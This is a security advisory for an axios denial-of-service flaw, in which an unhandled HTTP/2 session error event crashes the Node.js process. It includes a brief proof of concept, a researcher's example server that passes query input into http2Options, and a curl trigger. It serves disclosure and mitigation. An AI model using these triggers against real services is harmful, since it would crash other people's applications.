Vulnerability GHSA-542g-h47m-68v8
Summary
Axios: Denial of Service via Unhandled 'error' Event in HTTP/2 ClientHttp2Session Initialization
Details
Summary
Axios versions with Node.js HTTP/2 support can terminate the caller’s process when a ClientHttp2Session emits an error event that is not handled by axios.
This affects applications that use the Node HTTP adapter with httpVersion: 2. A malicious, unavailable, or non-HTTP/2 endpoint can cause an uncaught exception instead of a normal rejected axios request.
Impact
The impact is denial of service. In affected applications, an attacker who can influence the request destination, or operate the destination server, may be able to crash the Node.js process.
This does not affect default HTTP/1.1 usage, browser XHR/fetch adapters, or applications that do not enable axios HTTP/2 support.
Affected Functionality
Affected path:
- Node.js HTTP adapter
- httpVersion: 2
- HTTP/2 session creation/reuse through Http2Sessions
- Network/session failures emitted as ClientHttp2Session error events
Caller-controlled http2Options can make the issue easier to trigger, but passing arbitrary attacker input into axios config is caller-controlled behavior and should not be the primary advisory framing.
Technical Details
Http2Sessions.getSession() creates a session with http2.connect(authority, options) but only registers a close handler. It does not register an error handler on the returned ClientHttp2Session.
When the session emits error, Node treats it as an unhandled EventEmitter error and throws. This can bypass the normal axios Promise rejection path and terminate the process.
Proof of Concept of Attack
import axios from './index.js';
await axios.get('http://127.0.0.1:1/', {
httpVersion: 2,
timeout: 1000
});
Expected vulnerable behavior: the process exits with an uncaught ECONNREFUSED session error instead of only rejecting the axios request.
Workarounds
Disable axios HTTP/2 for untrusted or user-influenced destinations and use the default HTTP/1.1 adapter until a fixed release is available. Also avoid passing attacker-controlled values into http2Options; axios config is trusted application input.
Original report
Hi, i'm RelunSec a security researcher working with InsiteTech.jp
i want let you known, i finded a DoS in axios, to reproduce that, that is the example of a server
const http = require('http');
// Import the local axios version to ensure the patch is active
const axios = require('../../lib/axios.js').default;
const url = require('url');
// A public HTTP/2 server to make internal requests to.
// This simulates an external service your application might interact with over HTTP/2.
const TARGET_URL = 'https://nghttp2.org/';
const PORT = 3000;
const server = http.createServer(async (req, res) => {
const parsedUrl = url.parse(req.url, true);
const http2optionId = parsedUrl.query.http2optionId;
if (!http2optionId) {
console.warn(`[SERVER] Rejected request: Missing http2optionId parameter`);
res.writeHead(400, { 'Content-Type': 'text/plain' });
res.end('Error: Missing http2optionId query parameter. Usage: ?http2optionId=value\n');
return;
}
console.log(`[SERVER] Received request with http2optionId: ${http2optionId}`);
// Create an Axios instance configured for HTTP/2
// The 'id' in http2Options makes each session configuration unique.
const axiosInstance = axios.create({
baseURL: TARGET_URL,
httpVersion: 2,
http2Options: {
// rejectUnauthorized: false, // Uncomment if targeting a local HTTP/2 server with self-signed cert
id: http2optionId, // This is the attacker-controlled unique part
},
// Adding a short timeout to prevent attacker from waiting too long if target is slow
timeout: 5000
});
try {
const response = await axiosInstance.get('/');
res.writeHead(200, { 'Content-Type': 'text/plain' });
res.end(`Internal HTTP/2 request successful for ID: ${http2optionId}\nStatus: ${response.status}`);
} catch (error) {
// Check for the specific error indicating session limit reached
if (error.isAxiosError && error.code === axios.AxiosError.ERR_BAD_OPTION_VALUE) {
console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
res.writeHead(500, { 'Content-Type': 'text/plain' });
res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
} else {
console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}:`, error.message);
res.writeHead(500, { 'Content-Type': 'text/plain' });
res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: Generic error - ${error.message}`);
}
}
});
server.listen(PORT, () => {
console.log(`PoC Server listening on http://localhost:${PORT}`);
console.log(`Targeting internal HTTP/2 requests to: ${TARGET_URL}`);
console.log(`Send requests to http://localhost:${PORT}?http2optionId=...`);
console.log(`Expected behavior with current patch: After ~100 unique http2optionIds, subsequent requests will receive ERR_BAD_OPTION_VALUE.`);
});
i tested all that in latest git version, after starting the server.cjs, to trigger that you just need do
relunsec@relunsec:~/software/axios-1/poc/poc$ curl http://127.0.0.1:3000/?http2optionId=hi
curl: (52) Empty reply from server
that is extremly simple to trigger
it confirms a DoS in the HTTP/2 session cache, that needs be patched, the impact is will lead the server crashes and shutdown by an attacker, the server is written properly and no flaws in it and try catch blocks and errors handled however because that is an axios internal error will crash
Related Vulnerabilities
Other vulnerabilities affecting the same packages